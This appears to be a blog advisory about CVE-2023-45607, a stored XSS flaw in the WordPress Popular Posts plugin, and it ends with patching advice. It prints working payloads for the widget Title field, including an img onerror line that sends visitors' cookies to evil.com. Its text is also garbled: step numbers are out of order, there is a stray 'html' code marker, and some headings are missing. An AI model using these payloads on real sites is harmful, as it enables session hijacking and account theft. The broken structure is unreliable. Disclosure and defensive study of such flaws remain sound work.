CVE-2023-45607 - Authenticated Stored XSS in WordPress Popular Posts Plugin (<= 6.3.2) – Exploit Details & How to Patch

A major security vulnerability, CVE-2023-45607, was discovered in the popular WordPress plugin "WordPress Popular Posts" by Hector Cabrera. This flaw affects plugin versions up to 6.3.2, and it permits Contributor+ users to inject stored Cross-Site Scripting (XSS) payloads. If exploited, this vulnerability can let attackers execute malicious JavaScript code in the browsers of site admins or visitors, potentially leading to site takeover, phishing, or data theft.

In this long read, we’ll break down the vulnerability, show a sample exploit, and guide you to both understand and fix this security issue.

What Is Stored Cross-Site Scripting (XSS)?

Stored XSS happens when user input is saved (stored) by the application (for example, in the WordPress database) and later rendered on web pages without proper sanitization. When an attacker exploits this, their malicious JavaScript runs for anyone viewing the affected page – with all the permissions of their session.

About WordPress Popular Posts Plugin

- Plugin: WordPress Popular Posts

Vulnerable versions: 6.3.2 and earlier

This plugin lets you display your site’s most popular blog posts in sidebars or widget areas. Unfortunately, until version 6.3.3, it did not properly sanitize certain fields, creating a dangerous XSS vulnerability.

Vulnerability Details

CVE-2023-45607 affects any logged-in WordPress user with at least contributor access (or higher). It happens because fields handled by the plugin, particularly the widget title input, failed to clean JavaScript code. Malicious code entered here could remain in the database and be executed for anyone (including admins) viewing the page with the affected widget.

In the widget's Title field, the user inputs a malicious XSS payload (JavaScript code).

4. The page (typically the public site/sidebar) renders the widget, and the attacker’s code runs for all visitors or admins.

Proof of Concept: Exploit Code

Let’s see a simple code snippet showing how this attack works.

1. Login as Contributor

You need a Contributor or higher user.

Here’s a sample payload for the “Title” input on the widget

<script>alert('XSS by CVE-2023-45607')</script>

So, you would fill the widget setup like this

Title: <script>alert('XSS by CVE-2023-45607')</script>

3. Save the Widget

- Save/Update the widget.
- On the public/front-end, wherever the "Popular Posts" block appears, your browser executes that JavaScript code!

Attackers can steal admin cookies, create fake forms, or redirect users

<img src=x onerror="fetch('https://evil.com/?cookie='+document.cookie)">

`html

Privilege escalation: If an admin’s session is hijacked, an attacker gains full site control.

- Phishing: Attackers could craft popups/forms to steal passwords.

References

- Official WordPress Plugin Page
- Patch Details – Plugin SVN
- WPScan CVE-2023-45607 Entry
- NIST NVD - CVE-2023-45607

Conclusion

CVE-2023-45607 is a high-risk, easy-to-exploit flaw in a widely used WordPress plugin. Any site with untrusted contributors is at risk until patched. If you’re running WordPress Popular Posts 6.3.2 or below, update right away. Protect your site, your users, and your reputation!

*Share this with your team and stay safe!*

*This post was written exclusively for educational purposes. Always apply the latest security updates to your plugins and WordPress core.*

Timeline

Published on: 10/18/2023 14:15:09 UTC
Last modified on: 10/25/2023 01:26:18 UTC